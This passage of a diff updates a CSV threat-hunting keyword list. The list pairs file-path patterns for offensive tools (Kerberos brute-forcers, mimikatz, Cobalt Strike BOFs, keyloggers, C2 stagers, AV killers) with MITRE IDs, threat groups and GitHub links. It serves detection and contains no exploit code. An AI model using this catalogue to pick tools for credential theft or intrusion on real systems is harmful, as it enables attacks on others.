Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/kerberos-ldap-password-hunter*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","189","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*/kerberosticket.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*/kerbrute/*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*/kerbrute/*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*/KernelMii.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" -"*/keylogger.cpp*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*/keylogger.cpp*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*/KeyLogger.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/keylogger.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 
- T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" -"*/keylogger/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/keylogger.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*/keylogger/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/keyscan.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*/killav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/killav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/killav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/killav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/KillDefenderBOF*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*/kimi.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/kismet*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. 
and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","N/A","N/A","10","1297","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" -"*/kismetwireless/*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","10","1297","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" -"*/kitrap0d.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/kittens/haloKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/kittens/recycleKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/KittyStager/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/kiwi.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/kiwi_passwords.yar*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/kismet*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","N/A","N/A","10","1299","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" +"*/kismetwireless/*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","10","1299","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" +"*/kitrap0d.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/kittens/haloKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/kittens/recycleKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/KittyStager/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/kiwi.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/kiwi_passwords.yar*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*/klezVirus/CandyPotato*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/knqyf263/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/knqyf263/CVE-2022-0847","1","1","N/A","N/A","1","46","9","2022-03-08T13:54:08Z","2022-03-08T13:48:55Z" "*/knx-gateway-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -4143,11 +4167,11 @@
 "*/koadic.git*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*/Koh/*.cs*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
 "*/KrakenMask.git*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z"
-"*/krb5/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/krb5/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "*/krb5-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/krbjack.git*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
 "*/KrbRelay*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
-"*/krbrelayx*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*/krbrelayx*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
 "*/KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z"
